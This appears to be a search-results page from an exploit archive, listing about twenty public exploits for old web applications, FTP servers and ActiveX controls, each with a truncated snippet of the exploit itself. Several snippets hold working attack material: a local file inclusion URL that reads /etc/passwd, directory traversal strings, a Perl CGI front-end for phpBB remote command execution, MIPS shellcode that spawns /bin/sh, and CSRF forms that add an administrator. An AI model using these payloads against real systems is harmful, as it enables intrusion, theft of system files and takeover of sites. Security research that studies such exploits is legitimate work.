11967 matches found
Pearl Forums 2.4 - Multiple Remote File Include Vulnerabilities
No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register import re class TestPOCPOCBase: vulID = '64261' ssvid version = '1.0' author = 'kikay' vulDate = '2006-11-21' createDate ...
WebprojectDB <= 0.1.3 (INCDIR) Remote File Include Vulnerability
No description provided by source. $$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$ $$ $$ WebprojectDB INCDIR = v.0.1.3 Remote File Include Vulnerability $$ script site: http://sourceforge.net/projects/webprojectdb/ $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$...
isiAJAX 1 - (praises.php id) Remote SQL Injection Vulnerability
No description provided by source. :::::::-. ... ::::::. :::. ;;, ';, ;; ;;;;;;;, ;;; ' . ' $$, $$$$ $$$ $$$ Y$c$$ 888,o8P'88 .d888 888 Y88 MMMMP YmmMMMM MMM YM Discovered by dun \ dunatstrcpy.pl isiAJAX v1 SQL Injection Vulnerability Script: isiAJAX v1 Script site: http://isiajax.sourceforge.net...
Allomani Movies Library 2.0 - CSRF Vulnerability (Add Admin)
No description provided by source. Movies Library 2.0 XSRF Vulnerability Add Admin ==================================================================== .:. Author : AtT4CKxT3rR0r1ST [email protected] .:. Script : http://allomani.com/en/moviesscript.html === Exploit === form method=POST name=form0...
Pure-FTPd 1.0.21 (CentOS 6.2 & Ubuntu 8.04) - Crash PoC (Null Pointer Dereference)
No description provided by source. Pure-FTPd Crash PoC Null Pointer Dereference, tested with pure-ftpd v1.0.21 centos 6.2, ubuntu 8.04 latest version v1.0.36 is not affected !! discovered by Kingcope root@ubuntu: grep seg /var/log/syslog Aug 13 13:55:28 ubuntu kernel: 226.791747 pure-ftpd4825:...
freepost 0.1 r1 - Multiple Vulnerabilities
No description provided by source. Exploit FreePost 0.1 R1 SQL Injection Date: June 6nd 2012 Author: ThE g0bL!N Version: 0.1 R1 Vendor Url: http://www.phpbrasil.com/script/dYRoLbwWuzR/freepost-01-r1 Tested on: Xp Service Pack 2 Greets To : Lider Pirata , Yassine Tablouche , Ilyes , Bilal , Habib,...
phpBB <= 2.0.12 Change User Rights Authentication Bypass (c code)
No description provided by source. / Paisterist's code was nice but heres mil's version. precompiled: http://www.milw0rm.com/sploits/897.rar Usage: bcc32 897.cpp and place the exe in your firefox profile dir. Usually C:\Documents and Settings\Application...
PHP File Sharing System 1.5.1 - Multiple Vulnerabilities
No description provided by source. Title: PHP File Sharing System 1.5.1 Multiple Vulnerabilities Author: blake Tested on: Windows XP SP3 with xampplite 1 XSS http://192.168.1.149/fss/index.php?cam= 2 Directory transversal http://192.168.1.149/fss/index.php?cam=/../../../../../../../.. 3 Shell...
MaticMarket 2.02 for PHP Nuke LFI Vulnerability
No description provided by source. MaticMarket 2.02 for PHP Nuke LFI Vulnerability Url: http://sourceforge.net/projects/maticmarket Author: xer0x Expl: http://localhost/modules/maticmarket/deco/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00...
phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version)
No description provided by source. !/usr/bin/perl wphpbb.cgi hack service: http://site/cgi-bin/wphpbb.cgi use CGI qw:standard; $CGI::HEADERSONCE = 1; $CGI = new CGI; $atak = $CGI-paramatak; $serv = $CGI-paramserv; $dir = $CGI-paramdir; $topic = $CGI-paramtopic; $cmd = $CGI-paramcmd; print...
Linux/MIPS - execve /bin/sh - 48 bytes
No description provided by source. / Title: Linux/MIPS - execve /bin/sh - 48 bytes Date: 2011-11-24 Author: rigan - imrigan at gmail.com .text .global start start: slti $a2, $zero, -1 li $t7, 0x2f2f6269 sw $t7, -12$sp li $t6, 0x6e2f7368 sw $t6, -8$sp sw $zero, -4$sp la $a0, -12$sp slti $a1, $zero...
Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow PoC
No description provided by source. pre span style=font: 14pt Courier New;p align=centerb2007/05/14/b/p/span codespan style=font: 10pt Courier New;span class=general1-symbol----------------------------------------------------------------------------- bClever Database Comparer ActiveX version 2.2...
concrete5 CMS 5.6.1.2 - Multiple Vulnerabilities
No description provided by source. ============================================================= \ \ / / | | / \ / | | \ \ V / | | | | | | | | | / \ | ' \ | | | | | | | | | | | | '| | / / . \ | | | | | | || | | | | | | | | | // \ | ./ || / || || |/ || | | || blackpentesters.blogspot.com...
Silverstripe <= 2.3.5 - CSRForgery and Open Redirection Vulnerabilities
No description provided by source. Exploit Title: Silverstripe = 2.3.5 Cross Site Request Forgery & Open Redirection. Date: 12/01/10 Author: cp77fk4r | empty0pageSHIFT+2gmail.com | www.DigitalWhisper.co.il Vendor: www.silverstripe.org | Version: 2.0.0 Tested on: PHP Open Redirection: OWASP: An op...
wizmall 6.4 CSRF Vulnerabilities
No description provided by source. Exploit Title: wizmall 6.4 CSRF Vulnerabilities Date: 08/10/2010 Author: pyw1414 i2SEC Software Link: http://www.shop-wiz.com/board/main/view/root/wizmall01/159/0 Version: 6.4 UTF-8 For php Tested on: XP SP3 -= CSRF Exploit - Change Admin ID/PW =- html head...
Edraw Office Viewer Component 7.4 - ActiveX Stack Buffer Overflow
No description provided by source. !-- Exploit Title: Edraw Office Viewer Component V7.4 Stack Buffer Overflow Date: 25 Feb 2011 Author: Alexander Gavrun http://0x1byte.blogspot.com/ Software Link: http://www.ocxt.com/ Version: 7.4 Tested on: Windows Xp Sp2 + Internet Explorer 7 + OfficeViewer 7....
AJ Auction Pro Platinum - (seller_id) SQL Injection Vulnerability
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | | | /' \ /'\ /\ \ /'\ /\ \ | | /, \ /\/\L\ \ \ \ ,/\ /\ \ \ \ / | | //\ \ /' \ /\ //\ /'\ \ /\ \ \ \ /'\ \ | | \ \ /\ /\ \ \ \ /\ \L\ /\ /\ \ \ \ \ \ \ / /\ \L\ \ | | \ \ \ \\ \ \ /\ \\ \\ /\ \...
Open Bulletin Board <= 1.0.5 - SQL Injection Exploit
No description provided by source. !/usr/bin/perl -w OpenBB sql injection tested on Open Bulletin Board 1.0.5 with mysql coded by x97Rang 2005 RST/GHC Gr33tz: blf, 1dt.w0lf use IO::Socket; if @ARGV != 3 print \nUsage: $0 server path id\n; print like $0 forum.mysite.com / 1\n; print If found nothi...
Jobscript4Web 3.5 - Multiple CSRF Vulnerability
No description provided by source. Title: Jobscript4Web 3.5 Multiple CSRF Vulnerability Date: 17/12/2009 Author: bi0 Software Link: http://www.jobscript4web.com/ Version: 3.5 CVE : /\ == \ /\ \ /\ \ \ \ \ \ \ \ \ /\ \ \ \ \ \ \ \ // // // 01000010 01101001 01001111...
Eventy Online Scheduler 1.8 - Multiple Vulnerabilities
No description provided by source. Eventy Online Scheduler V1.8 - Multiple Vulnerabilties =================================================================== .:. Author : AtT4CKxT3rR0r1ST .:. Contact : [email protected] , [email protected] .:. Home : http://www.iphobos.com/blog/ .:. Script :...